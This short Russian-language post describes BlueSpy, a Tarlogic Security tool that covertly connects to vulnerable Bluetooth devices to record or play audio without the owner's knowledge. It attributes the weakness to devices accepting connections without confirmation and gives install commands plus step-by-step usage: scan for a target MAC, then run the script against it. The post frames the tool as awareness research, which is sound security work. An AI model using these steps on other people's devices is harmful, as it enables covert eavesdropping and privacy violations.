BlueSpy

Исследователи из Tarlogic Security представили BlueSpy, который позволяет незаметно подключаться к уязвимым Bluetooth и записывать/проигрывать звук без ведома владельца.
Утилита разработана с целью повышения осведомленности о небезопасном использовании устройств Bluetooth и необходимости разработки единой методологии для оценки безопасности.
Атака возможна из-за нарушений рекомендаций BSAM, особенно контроля BSAM-PA-05 —> устройства принимают соединения без подтверждения

Характеристика:
Перехват и анализ Bluetooth-трафика
Тестирование на уязвимости
Spoofing (подмена устройств)
Fuzzing (нагрузочное тестирование)

Установка:

sudo apt install bluez pulseaudio-utils

(Для debian систем)

sudo pacman -S bluez libpulse

(Для arch систем)

git clone https://github.com/TarlogicSecurity/BlueSpy.git

cd BlueSpy

Использование:

sudo systemctl start bluetooth

запуск демона bluetooth

bluetoothctl

scan on

Ищем MAC который нам нужен

scan off

exit

python3 BlueSpy.py -a [MAC]